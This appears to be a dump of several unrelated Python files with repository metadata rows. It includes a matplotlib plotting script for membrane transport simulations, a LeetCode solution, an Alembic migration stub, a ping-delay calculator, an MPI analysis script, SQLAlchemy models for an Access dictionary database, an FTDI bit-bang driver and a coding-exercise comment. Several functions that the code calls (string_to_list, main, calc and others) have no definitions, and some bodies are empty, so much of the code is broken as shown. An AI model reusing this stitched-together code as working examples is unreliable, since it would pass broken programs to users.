] | 2 | 2019-08-22T20:11:46.000Z | 2019-08-22T22:35:17.000Z | Ben_Manuscripts/transport/figures/hops_dwells.py | shirtsgroup/LLC_Membranes | e94694f298909352d7e9d912625314a1e46aa5b6 | [
"MIT"
] | 4 | 2019-07-06T15:41:53.000Z | 2021-01-27T17:59:13.000Z | #!/usr/bin/env python
import numpy as np
import matplotlib.pyplot as plt
from LLC_Membranes.timeseries.forecast_ctrw import System
from LLC_Membranes.llclib import file_rw
import names
residues = ["GCL", "SOH"]
wt = 10
path = "/home/bcoscia/Documents/Gromacs/Transport/NaGA3C11"
colors = ['blue', 'red']
opacity = 1
nbins = 25
lw = 2
fig, ax = plt.subplots(1, 2, figsize=(10, 5))
for j, r in enumerate(residues):
obj = file_rw.load_object('%s/%s/%swt/forecast_%s.pl' % (path, r, wt, r))
hops = []
for i in obj.hop_lengths:
hops += i
print(max(hops))
if j == 0:
hop_hist, edges = np.histogram(hops, density=True, bins=nbins)
bounds = [edges[0], edges[-1]]
else:
hop_hist, edges = np.histogram(hops, density=True, bins=np.linspace(bounds[0], bounds[1], nbins + 1))
hop_outline = np.zeros([len(hop_hist)*2 + 2, 2])
hop_outline[::2, 0] = edges
hop_outline[1::2, 0] = edges
hop_outline[1:-1:2, 1] = hop_hist
hop_outline[2:-1:2, 1] = hop_hist
if j == 0:
dwell_hist, edges = np.histogram(obj.dwell_times, density=True, bins=nbins)
bounds_power = [edges[0], edges[-1]]
else:
dwell_hist, edges = np.histogram(obj.dwell_times, density=True, bins=np.linspace(bounds_power[0], bounds_power[1], nbins + 1))
dwell_outline = np.zeros([len(dwell_hist)*2 + 2, 2])
dwell_outline[::2, 0] = edges
dwell_outline[1::2, 0] = edges
dwell_outline[1:-1:2, 1] = dwell_hist
dwell_outline[2:-1:2, 1] = dwell_hist
ax[0].plot(hop_outline[:, 0], hop_outline[:, 1], color=colors[j], alpha=opacity, linewidth=lw)
ax[1].plot(dwell_outline[:, 0], dwell_outline[:, 1], color=colors[j], alpha=opacity, label=names.res_to_name[r], linewidth=lw)
ax[0].tick_params(labelsize=14)
ax[1].tick_params(labelsize=14)
ax[1].legend(fontsize=14)
ax[0].set_ylabel('Frequency', fontsize=14)
ax[0].set_xlabel('Hop Length (nm)', fontsize=14)
ax[1].set_xlabel('Dwell Time (ns)', fontsize=14)
plt.tight_layout()
plt.savefig('dwell_hop_%s.pdf' % '_'.join(residues))
plt.show()
| 32.213115 | 128 | 0.692112 |
49d70088af3c73de71bed44ae91ad6608da6929f | 1,275 | py | Python | 1450.py | sinasiruosnejad/leetcode | 8fe5a400bc03a5e129835e380ff9fe72af681d8a | [
"MIT"
] | null | null | null | 1450.py | sinasiruosnejad/leetcode | 8fe5a400bc03a5e129835e380ff9fe72af681d8a | [
"MIT"
] | null | null | null | 1450.py | sinasiruosnejad/leetcode | 8fe5a400bc03a5e129835e380ff9fe72af681d8a | [
"MIT"
] | null | null | null |
start_time=[]
end_time=[]
query_time=0
students_count=0
string_to_list('start time : ',start_time)
string_to_list('end time : ',end_time)
query_time=int(input('query time : '))
if not(1<=len(start_time)<=100):
print('start time list out of range')
exit()
elif not(1<=len(end_time)<=100):
print('end time list out of range')
exit()
elif len(start_time)!=len(end_time):
print('length of lists start and end are not the same')
exit()
elif not(1<=query_time<=1000):
print('query time out of range')
exit()
for i in range(len(start_time)):
if not(1<=start_time[i]<=1000):
print(f'start time [{i}] out of range')
exit()
elif not(1<=end_time[i]<=1000):
print(f'end time [{i}] out of range')
exit()
if start_time[i]<=end_time[i]:
temp=end_time[i]-start_time[i]
if temp>=query_time:
students_count+=1
print(students_count) | 24.519231 | 59 | 0.542745 |
49d77fe266bda3b95de391977fa5e234a79bc1d6 | 3,000 | py | Python | backend/model/migrate/versions/4dbaa3104f4_.py | deti/boss | bc0cfe3067bf1cbf26789f7443a36e7cdd2ac869 | [
"Apache-2.0"
] | 7 | 2018-05-20T08:56:08.000Z | 2022-03-11T15:50:54.000Z | backend/model/migrate/versions/4dbaa3104f4_.py | deti/boss | bc0cfe3067bf1cbf26789f7443a36e7cdd2ac869 | [
"Apache-2.0"
] | 2 | 2021-06-08T21:12:51.000Z | 2022-01-13T01:25:27.000Z | backend/model/migrate/versions/4dbaa3104f4_.py | deti/boss | bc0cfe3067bf1cbf26789f7443a36e7cdd2ac869 | [
"Apache-2.0"
] | 5 | 2016-10-09T14:52:09.000Z | 2020-12-25T01:04:35.000Z | """Added tariff
Revision ID: 4dbaa3104f4
Revises: 1d6f96d1df
Create Date: 2015-05-27 16:00:09.343862
"""
# revision identifiers, used by Alembic.
revision = '4dbaa3104f4'
down_revision = '1d6f96d1df'
branch_labels = None
depends_on = None
from alembic import op
import sqlalchemy as sa
| 32.967033 | 85 | 0.685667 |
49da0b5cb2458b175611bedd60d99e1e2e8ba045 | 4,970 | py | Python | delay.py | MythologicalMC/Delay | 932902e86e9493fa5d08cdb3857d74a178e7f2bc | [
"MIT"
] | null | null | null | delay.py | MythologicalMC/Delay | 932902e86e9493fa5d08cdb3857d74a178e7f2bc | [
"MIT"
] | null | null | null | delay.py | MythologicalMC/Delay | 932902e86e9493fa5d08cdb3857d74a178e7f2bc | [
"MIT"
] | null | null | null | #imports
import os
import subprocess
from colorama import init,Fore, Back, Style
import asyncio
import urllib.parse
import time
from time import perf_counter
init(convert=True)
#vars
ver = "Beta, Lots of commits going on!"
ping = 0
pings = []
tempping = 0
searches = 0
base = 300
delay = 0
gotQ = ""
dropTime = 0
reqTime = 0
#funcs
#THIS PING CHECK CODE IS FROM kingscratss#3407 on discord!!
#cool ascii text thing/creds
os.system("cls")
print(Fore.LIGHTBLUE_EX + '''
''')
print(Fore.LIGHTBLUE_EX + " By Mythological, Version: " + ver)
print()
print()
#assign vars
ping = setupPing()
searches = setupSearches()
#computate and print
delay = calc()
out()
| 37.938931 | 217 | 0.567203 |
49da88047bb20d46e7f9d9dfc0e2238764393527 | 10,360 | py | Python | src/calc/parallel/calc_qual.py | paytonrodman/athena-analysis | f635338122e15c318dfd754d06cc3dbaa42273d2 | [
"BSD-3-Clause"
] | null | null | null | src/calc/parallel/calc_qual.py | paytonrodman/athena-analysis | f635338122e15c318dfd754d06cc3dbaa42273d2 | [
"BSD-3-Clause"
] | null | null | null | src/calc/parallel/calc_qual.py | paytonrodman/athena-analysis | f635338122e15c318dfd754d06cc3dbaa42273d2 | [
"BSD-3-Clause"
] | null | null | null | #!/usr/bin/env python3
#
# calc_qual.py
#
# A program to calculate the quality factors and magnetic angle within some defined region
# of an Athena++ disk using MPI
#
# To run:
# mpirun -n [n] python calc_qual.py [options]
# for [n] cores.
#
import numpy as np
import os
import sys
sys.path.insert(0, '/home/per29/rds/rds-accretion-zyNhkonJSR8/athena-analysis/dependencies')
#sys.path.insert(0, '/Users/paytonrodman/athena-sim/athena-analysis/dependencies')
import athena_read
import AAT
import glob
import re
import csv
import scipy.stats as st
import argparse
from math import sqrt
from mpi4py import MPI
# Execute main function
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='Calculate various quality factors from raw simulation data.')
parser.add_argument('prob_id',
help='base name of the data being analysed, e.g. inflow_var or disk_base')
parser.add_argument('-u', '--update',
action="store_true",
help='specify whether the results being analysed are from a restart')
parser.add_argument('-rl', '--r_lower',
type=float,
default=None,
help='value of lower r bound of region being analysed, must be between x1min and x1max (default=5)')
parser.add_argument('-ru', '--r_upper',
type=float,
default=None,
help='value of upper r bound of region being analysed, must be between x1min and x1max (default=100)')
parser.add_argument('-tl', '--theta_lower',
type=float,
default=None,
help='value of lower theta bound of region being analysed, must be between x2min and x2max (default=0.982)')
parser.add_argument('-tu', '--theta_upper',
type=float,
default=None,
help='value of upper theta bound of region being analysed, must be between x2min and x2max (default=2.159)')
args = parser.parse_args()
main(**vars(args))
| 40.948617 | 175 | 0.598359 |
49db3a1ecbfa19102c7269a3533f50d40a8b3fab | 4,838 | py | Python | config/access/model_base.py | torrua/loglan_converter | e040825354bd07dda4f44d8dd84c79dc1db405c9 | [
"MIT"
] | null | null | null | config/access/model_base.py | torrua/loglan_converter | e040825354bd07dda4f44d8dd84c79dc1db405c9 | [
"MIT"
] | null | null | null | config/access/model_base.py | torrua/loglan_converter | e040825354bd07dda4f44d8dd84c79dc1db405c9 | [
"MIT"
] | null | null | null | from sqlalchemy import Column, String, Integer, Text, Boolean, DateTime
from config.access import Base
from sqlalchemy.ext.declarative import declared_attr
from datetime import datetime
def export(self):
pass
class AccessAuthor(Base, BaseFunctions):
"""
Author model
"""
__tablename__ = "Author"
sort_name = "Author"
id = Column(Integer, primary_key=True)
abbreviation = Column(String(64), unique=True, nullable=False)
full_name = Column(String(64))
notes = Column(String(128))
class AccessDefinition(Base, BaseFunctions):
__tablename__ = 'WordDefinition'
sort_name = "Definition"
word_id = Column("WID", Integer)
position = Column("I", Integer, nullable=False)
usage = Column("Usage", String(64))
grammar = Column("Grammar", String(8))
body = Column("Definition", Text, nullable=False)
main = Column("Main", String(8))
case_tags = Column("Tags", String(16))
id = Column("id", Integer, primary_key=True)
class AccessEvent(Base, BaseFunctions):
"""
Event model
"""
__tablename__ = "LexEvent"
sort_name = "Event"
id = Column("EVT", Integer, primary_key=True)
name = Column("Event", String(64), nullable=False)
date = Column("When", String(32), nullable=False)
definition = Column("WhyWhat", Text, nullable=False)
annotation = Column("DictionaryAnnotation", String(16))
suffix = Column("FilenameSuffix", String(16))
class AccessSetting(Base, BaseFunctions):
"""
Setting model
"""
__tablename__ = "Settings"
sort_name = "Settings"
date = Column("DateModified", DateTime, primary_key=True)
db_version = Column("DBVersion", Integer, nullable=False)
last_word_id = Column("LastWID", Integer, nullable=False)
db_release = Column("DBRelease", String(16), nullable=False)
class AccessSyllable(Base, BaseFunctions):
"""
Syllable model
"""
__tablename__ = "Syllable"
sort_name = "Syllable"
id = Column(Integer, primary_key=True, autoincrement=True)
name = Column("characters", String(8), primary_key=True)
type = Column(String(32), nullable=False)
allowed = Column(Boolean)
class AccessType(Base, BaseFunctions):
"""
Type model
"""
__tablename__ = "Type"
sort_name = "Type"
id = Column(Integer, primary_key=True)
type = Column(String(16), nullable=False)
type_x = Column(String(16), nullable=False)
group = Column(String(16), nullable=False)
parentable = Column(Boolean, nullable=False)
description = Column(String(255), nullable=True)
class AccessWord(Base, BaseFunctions):
"""
Word model
"""
__tablename__ = "Words"
sort_name = "Word"
word_id = Column("WID", Integer, nullable=False, primary_key=True)
type = Column("Type", String(16), nullable=False)
type_x = Column("XType", String(16), nullable=False)
affixes = Column("Affixes", String(16))
match = Column("Match", String(8))
authors = Column("Source", String(64))
year = Column("Year", String(128))
rank = Column("Rank", String(128))
origin = Column("Origin", String(128))
origin_x = Column("OriginX", String(64))
used_in = Column("UsedIn", Text)
TID_old = Column("TID", Integer) # references
class AccessWordSpell(Base, BaseFunctions):
"""WordSpell model"""
__tablename__ = "WordSpell"
sort_name = "WordSpell"
word_id = Column("WID", Integer, nullable=False)
word = Column("Word", String(64), nullable=False)
sort_a = Column("SortA", String(64), nullable=False)
sort_b = Column("SortB", String(64), nullable=False)
event_start_id = Column("SEVT", Integer, nullable=False)
event_end_id = Column("EEVT", Integer, nullable=False)
origin_x = Column("OriginX", String(64))
id = Column(Integer, primary_key=True)
'''
class AccessXWord(Base, BaseFunctions):
"""XWord model"""
__tablename__ = "XWord"
sort_name = "XWord"
XSortA = Column(String)
XSortB = Column(String)
WID = Column(String, primary_key=True)
I = Column(String)
XWord = Column(String)
'''
| 28.627219 | 84 | 0.65895 |
49dbc6af92d52afcc0e8a89b6aa09a1a1c7354f4 | 16,726 | py | Python | src/fixate/drivers/ftdi.py | stig999/Fixate | 24b4a16736c80b28f40aeb52972c52f9654983ef | [
"MIT"
] | 1 | 2017-11-23T04:18:03.000Z | 2017-11-23T04:18:03.000Z | src/fixate/drivers/ftdi.py | stig999/Fixate | 24b4a16736c80b28f40aeb52972c52f9654983ef | [
"MIT"
] | 5 | 2018-08-24T11:13:29.000Z | 2018-08-29T00:40:36.000Z | src/fixate/drivers/ftdi.py | stig999/Fixate | 24b4a16736c80b28f40aeb52972c52f9654983ef | [
"MIT"
] | null | null | null | import ctypes
import struct
import time
from fixate.core.common import bits
from fixate.core.exceptions import InstrumentError, InstrumentNotConnected
import fixate.config
import fixate.core.discover
def open(ftdi_description=""):
"""Open is the public api for the bit bang driver for discovering and opening a connection
to a valid bit bang device
:param restrictions:
A dictionary containing the extents of the required equipment
:return:
A instantiated class connected to a valid bit_bang class
"""
devices = fixate.core.discover.discover_ftdi()
for dev in devices:
if ftdi_description.encode() == dev.Description or ftdi_description == "":
return FTDI2xx(dev.Description)
raise InstrumentNotConnected("No valid ftdi found by description '{}'".format(ftdi_description))
# Definitions
UCHAR = ctypes.c_ubyte
PCHAR = ctypes.POINTER(ctypes.c_char)
PUCHAR = ctypes.POINTER(ctypes.c_ubyte)
DWORD = ctypes.c_ulong
LPDWORD = ctypes.POINTER(ctypes.c_ulong)
FT_HANDLE = DWORD
# Add null padding if 64 bit
if struct.calcsize("P") == 8:
else: # 32 bit
try:
ftdI2xx = ctypes.WinDLL("FTD2XX.dll")
except Exception as e:
raise ImportError("Unable to find FTD2XX.dll.\nPlugging in FDTI device will install DLL.") from e
_ipdwNumDevs = DWORD(0)
_p_ipdwNumDevs = LPDWORD(_ipdwNumDevs)
# FT_GetDeviceInfoList
def configure_bit_bang(self, bit_mode, bytes_required, latch_mask=1, clk_mask=2, data_mask=4, invert_mask=0b000):
"""
:param bit_mode:
:param bytes_required:
:param latch_mask: CBUS Pin for latch. 1 Default for Relay Matrix
:param clk_mask: CBUS Pin for clock. 2 Default for Relay Matrix
:param data_mask: CBUS Pin for data. 4 Default for Relay Matrix
:param invert_mask: Mask for inverting. 0b111 For all inverted 0b000 for all non inverted
based on MSB 0b<latch><clock><data> LSB
:return:
"""
self.bb_bytes = bytes_required
self.bit_mode = bit_mode
self.write_bit_mode(self.pin_value_mask)
self.bb_data = data_mask
self.bb_clk = clk_mask
self.bb_latch = latch_mask
self.bb_inv_mask = 0
if (1 << 2) & invert_mask:
self.bb_inv_mask += self.bb_latch
if (1 << 1) & invert_mask:
self.bb_inv_mask += self.bb_clk
if 1 & invert_mask:
self.bb_inv_mask += self.bb_data
| 36.679825 | 117 | 0.598589 |
49dc810a61e2972f79b20f3f39e3b0c03cad34a5 | 552 | py | Python | Data Structures/Python/find-the-parity-outier.py | KhushMody/Ds-Algo-HacktoberFest | 2cb5bdcfcdcb87b67ee31941cc9afc466507a05b | [
"MIT"
] | 12 | 2020-10-04T06:48:29.000Z | 2021-02-16T17:54:04.000Z | Data Structures/Python/find-the-parity-outier.py | KhushMody/Ds-Algo-HacktoberFest | 2cb5bdcfcdcb87b67ee31941cc9afc466507a05b | [
"MIT"
] | 14 | 2020-10-04T09:09:52.000Z | 2021-10-16T19:59:23.000Z | Data Structures/Python/find-the-parity-outier.py | KhushMody/Ds-Algo-HacktoberFest | 2cb5bdcfcdcb87b67ee31941cc9afc466507a05b | [
"MIT"
] | 55 | 2020-10-04T03:09:25.000Z | 2021-10-16T09:00:12.000Z | # You are given an array (which will have a length of at least 3, but could be very large) containing integers. The array is either entirely comprised of odd integers or entirely comprised of even integers except for a single integer N. Write a method that takes the array as an argument and returns this "outlier" N.
# Examples
# find_outlier([2, 4, 6, 7]) => 7
# find_outlier([3, 7, 11, 2]) => 2
| 61.333333 | 317 | 0.711957 |